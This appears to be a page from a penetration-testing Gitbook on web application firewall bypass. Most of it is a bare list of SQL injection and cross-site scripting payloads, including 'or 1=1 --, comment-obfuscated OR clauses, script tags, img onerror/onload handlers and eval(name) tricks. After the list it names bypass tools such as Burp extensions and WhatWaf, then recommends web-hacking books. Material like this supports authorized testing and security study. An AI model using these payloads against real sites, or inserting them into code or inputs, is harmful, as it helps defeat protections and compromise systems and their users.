WAF Bypass
'or 1=1 --
' or 2=2--
alert(0)
%00alert(0)
<script>alert(0)</script>
<script type=vbscript>MsgBox(0)</script>
' or ""='r
'/**/OR/**/""='
<script>alert(0)</script>
<img src="x:x" onerror="alert(0)"></img>
<img src=x:x onerror=alert(0)//></img>
<img src=http://url onload=alert(0)//></img>
1 or 1=1
(1)or(1)=(1)
eval(name)
x=this.name
eval(name)
X(0?$:name+1)

bypasswaf - Burp Extension
nowafpls - Burp Extension
WAF Community Bypasses

Cookie Version
Tools
WhatWaf
Resources
Interesting Books
Interesting BooksThe Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
Last updated